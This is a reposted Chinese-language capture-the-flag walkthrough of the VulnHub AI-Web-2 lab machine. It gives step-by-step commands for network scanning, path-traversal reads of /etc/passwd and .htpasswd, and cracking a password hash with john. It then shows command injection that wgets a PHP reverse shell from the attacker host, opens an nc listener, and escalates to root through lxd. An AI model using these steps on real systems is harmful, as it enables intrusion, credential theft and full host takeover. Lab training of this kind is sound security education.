vulnhub之AI-Web-2的实践

admin 2024年6月3日11:36:17评论5 views字数 1999阅读6分39秒阅读模式

本周实践的是vulnhub的AI-Web-2镜像,

下载地址,https://download.vulnhub.com/aiweb/AI-Web-2.0.7z,

用workstation导入成功,

做地址扫描,sudo netdiscover -r 192.168.220.0/24,

获取到靶机地址是192.168.220.169,

vulnhub之AI-Web-2的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.169,

发现靶机有22端口的ssh服务和80端口的http服务,

vulnhub之AI-Web-2的实践

浏览器访问http://192.168.220.169,

vulnhub之AI-Web-2的实践

用admin当用户名进行注册再登录,

获取到应用是XuezhuLi FileSharing,

vulnhub之AI-Web-2的实践

在网上搜XuezhuLi FileSharing的漏洞和利用方法,

vulnhub之AI-Web-2的实践

浏览器访问http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd,

vulnhub之AI-Web-2的实践

继续浏览器访问http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd,

获取到web登录的账号和密码hash,

vulnhub之AI-Web-2的实践

保存到hash.txt,并下载密码字典保存到dict.txt,

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt,

进行暴破,john --wordlist=dict.txt hash.txt,

获取到aiweb2admin/c.ronaldo,

vulnhub之AI-Web-2的实践

对http服务继续进行目录暴破,dirb http://192.168.220.169,

获取到http://192.168.220.169/webadmin,

vulnhub之AI-Web-2的实践

浏览器访问http://192.168.220.169/webadmin并登录,

获取到提示robots文件里有信息,

vulnhub之AI-Web-2的实践

浏览器访问http://192.168.220.169/webadmin/robots.txt,

获取到路径/H05Tpin9555/,

vulnhub之AI-Web-2的实践

浏览器访问http://192.168.220.169/webadmin/H05Tpin9555/,vulnhub之AI-Web-2的实践

发现可以提交命令,尝试|| id,成功,

vulnhub之AI-Web-2的实践

在kali攻击机上准备反弹shell脚本,

cp /usr/share/webshells/php/php-reverse-shell.php shell.php,

python2 -m SimpleHTTPServer,

输入|| wget http://192.168.220.157:8000/shell.php,

查看结果,|| ls,

vulnhub之AI-Web-2的实践

kali攻击机上开启反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.220.169/webadmin/H05Tpin9555/shell.php,获取到反弹shell,并查找到ssh的用户名密码,

n0nr00tuser/zxowieoi4sdsadpEClDws1sf,

vulnhub之AI-Web-2的实践

ssh登录,ssh [email protected],发现有lxd权限,

在kali攻击机上下载容器镜像,

git clone https://github.com/saghul/lxd-alpine-builder.git,

cd lxd-alpine-builder,

kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,

靶机上进入临时目录,cd /tmp,

下载容器镜像,wget http://192.168.220.157:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz,

导入容器镜像,lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage,

查看,lxc image list,

初始化,lxc init myimage ignite -c security.privileged=true,

配置挂载宿主机根目录,lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true,

启动容器实例,lxc start ignite,

进入容器实例,lxc exec ignite /bin/sh,id确认是root,

进入挂载目录,cd /mnt/root/root,夺旗成功,cat flag.txt,

vulnhub之AI-Web-2的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之AI-Web-2的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月3日11:36:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之AI-Web-2的实践https://cn-sec.com/archives/2808653.html

发表评论

匿名网友 填写信息